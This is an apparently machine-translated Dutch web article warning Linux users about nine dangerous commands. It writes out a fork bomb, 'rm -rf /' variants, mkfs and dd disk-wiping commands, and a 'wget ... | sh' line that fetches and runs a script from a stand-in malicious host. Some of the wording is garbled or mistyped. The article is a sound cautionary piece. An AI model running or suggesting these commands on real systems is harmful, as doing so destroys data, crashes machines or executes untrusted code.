nl.hideout-lastation.com
Paradijs Voor Ontwerpers En Ontwikkelaars


9 Linux-opdrachten en codes om op te passen

Linux shell / terminal-opdrachten zijn erg krachtig en slechts een eenvoudige opdracht zou kunnen leiden tot het verwijderen van een map, bestanden of hoofdmap, enz.

In sommige gevallen vraagt ​​Linux je niet eens om bevestiging, maar voert het de opdracht meteen uit, waardoor je waardevolle gegevens en informatie verliest die in deze bestanden en mappen zijn opgeslagen.

Het is gebruikelijk dat mensen inhoud plaatsen op het web die nieuwe Linux-gebruikers aanbeveelt om deze opdrachten uit te voeren . Dit lijkt misschien een grap voor iemand die de inhoud heeft gepost maar het is geen lachertje voor de persoon aan de andere kant.

We hebben een aantal Linux-commando's verzameld die behoorlijk schadelijk zijn voor je systeem om je te helpen ze te vermijden. Onthoud dat ze inderdaad gevaarlijk zijn en zelfs op verschillende manieren kunnen worden gewijzigd om nieuwe opdrachten te produceren die meer schade kunnen aanrichten.

Een belangrijk ding om op te merken is dat sommige van deze commando's alleen gevaarlijk zijn als ze worden voorafgegaan door sudo op Ubuntu . Op andere distributies van Linux zijn de meeste van deze gegeven opdrachten gevaarlijk om als root uit te voeren.

Bekijk de 9 opdrachten en codes die u niet moet uitvoeren.

1. Linux Fork Bomb Command

:(){ :|: & };: ook wel bekend als Fork Bomb is een denial-of-service-aanval op een Linux-systeem. :(){ :|: & };: is een bash-functie. Als het eenmaal is uitgevoerd, herhaalt het zichzelf meerdere keren totdat het systeem vastloopt .

Je kunt er alleen vanaf komen door je systeem opnieuw op te starten. Dus wees voorzichtig bij het uitvoeren van deze opdracht op je Linux-shell.

2. mv map / dev / null Commando

mv folder/dev/null is een ander riskant commando. Dev/null of null device is een apparaatbestand dat alle erop geschreven gegevens verwijdert, maar het meldt dat de schrijfbewerking met succes is uitgevoerd . Het is ook bekend als bit bucked of black hole .

3. rm-rf commando

rm -rf opdracht is een snelle manier om een map en de inhoud ervan in het Linux-besturingssysteem te verwijderen. Als u niet weet hoe u het goed moet gebruiken, kan het erg gevaarlijk worden voor het systeem. De meest voorkomende combinaties en opties die worden gebruikt met de opdracht rm-rf worden hieronder vermeld:

  • rm opdracht wordt gebruikt om de bestanden in het Linux-systeem te verwijderen.
  • rm -f commando verwijdert alleen-lezen bestanden in de map zonder vragen.
  • rm -r commando verwijdert de inhoud van een map recursief.
  • rm -d opdracht rm -d wordt gebruikt om een ​​lege map te verwijderen, maar deze weigert de map te verwijderen als deze niet leeg is.
  • rm -rf/ command wordt gebruikt voor geforceerd verwijderen (het verwijdert het zelfs als het is beveiligd tegen schrijven) van alle inhoud in de hoofdmap en submappen.
  • rm -rf* commando wordt gebruikt voor geforceerde verwijdering van alle inhoud in de huidige map (directory waarin u momenteel werkt) en submappen.
  • rm -rf. commando wordt gebruikt voor geforceerd verwijderen van alle inhoud in de huidige map en submappen. De opdracht rm -r.[^.]* Kan ook worden gebruikt.
  • rm -i opdracht rm -i wordt gebruikt voor het verwijderen van bestanden en mappen, maar er verschijnt een vraag voordat deze wordt verwijderd.

4. opdracht mkfs

mkfs kan een gevaarlijk commando zijn voor je op Linux gebaseerde systeem als je het doel ervan niet kent. Alles dat na de mkfs wordt geschreven, wordt geformatteerd en vervangen door een leeg Linux-bestandssysteem .

Alle onderstaande commando's zullen de harde schijf formatteren en het vereist beheerdersrechten:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Het commando mkfs.cramfs zal hetzelfde doen als het bovenstaande, maar het vereist geen beheerdersrechten om uit te voeren.

5. Tar Bomb

De tar opdracht wordt gebruikt voor het combineren van meerdere bestanden in een enkel bestand (gearchiveerd bestand) in .tar- indeling. Met deze opdracht kan een Tape Archive (Tar) bom worden gemaakt.

Het is een archiefbestand dat ontploft in duizenden of miljoenen bestanden met namen die lijken op de bestaande bestanden in de huidige map in plaats van in een nieuwe map als ze niet zijn opgeheven.

Je kunt voorkomen dat je slachtoffer wordt van een teerbom door regelmatig een nieuwe beschermende map aan te maken wanneer je een tar-bestand ontvangt en vervolgens het ontvangen tar-bestand naar deze map te verplaatsen voordat je ontslaat.

Als het tar-bestand inderdaad een teerbom is, kun je eenvoudigweg de zojuist gemaakte directory verwijderen om ervan af te komen. Een andere manier om de explosie van een teerbom te voorkomen, is via de optie -t om alle inhoud van een tar-bestand op te sommen om u een idee te geven van het type inhoud dat zich in het tar-bestand bevindt.

6. Opdracht dd

De opdracht dd wordt gebruikt voor het kopiëren en converteren van partities op de harde schijf . Het kan echter schadelijk zijn als u de verkeerde bestemming opgeeft.

Het commando kan een van deze zijn:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Met de volgende opdracht wordt de gehele primaire vaste schijf dd if=/dev/zero of=/dev/had : dd if=/dev/zero of=/dev/had

7. Shell-scriptcode

Iemand kan je het slachtoffer maken door je de link naar een shell-script te geven en je te bevestigen om het te downloaden en uit te voeren . Het script bevat mogelijk kwaadaardige of gevaarlijke code. Het formaat van de opdracht kan er als volgt uitzien: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . De wget zal het script downloaden terwijl de sh de uitvoering van het script downloadt.

8. Kwaadaardige broncode

Iemand geeft je de broncode en vraagt ​​je om het te compileren. De code lijkt misschien een normale code te zijn, maar in feite is sommige schadelijke code verborgen in de grote broncode en kan het uw systeem beschadigen. Om te voorkomen dat je slachtoffer wordt van dit soort aanvallen, accepteer en compileer je je broncode alleen van betrouwbare bronnen .

9. Decompressiebom

U hebt een gecomprimeerd bestand ontvangen en u wordt gevraagd om dit bestand uit te pakken, dat erg klein lijkt te zijn, maar mogelijk enkele KB bevat. In feite bevat dit gecomprimeerde bestand van kleine omvang zeer sterk gecomprimeerde gegevens .

Nadat het bestand is gedecomprimeerd, worden honderden GB gegevens geëxtraheerd die uw harde schijf kunnen opvullen om de prestaties van uw systeem te verminderen. Om deze situatie te voorkomen, moet u altijd onthouden dat u gegevens uit betrouwbare bronnen accepteert.

Een onboarding-proces ontwerpen dat gebruikers echt helpt te leren

Een onboarding-proces ontwerpen dat gebruikers echt helpt te leren

Bij het starten van een nieuwe app krijg je meestal moeite om te leren hoe het werkt. Je zult het snel onder de knie krijgen, maar er is altijd een leerproces . Het doel van onboarding is om nieuwe gebruikers kennis te laten maken met een website, programma of applicatie. Met onboarding moet u leren over individuele functies, hoe ze werken en hoe de app waarde biedt voor de gebruiker

(Technische en ontwerptips)

20 gratis scriptlettertypen die u kunt downloaden

20 gratis scriptlettertypen die u kunt downloaden

Omdat de ontwerpen van scriptlettertypen zijn gebaseerd op de vloeiendheid van echt handschrift, kunnen ze een persoonlijk tintje toevoegen aan vrijwel elk ontwerp, vooral een ontwerp met typografie. Daarom zijn scriptlettertypen echt handige hulpmiddelen als het gaat om het ontwerpen van dingen zoals postkaarten, flyers en uitnodigingskaarten voor een bruiloft

(Technische en ontwerptips)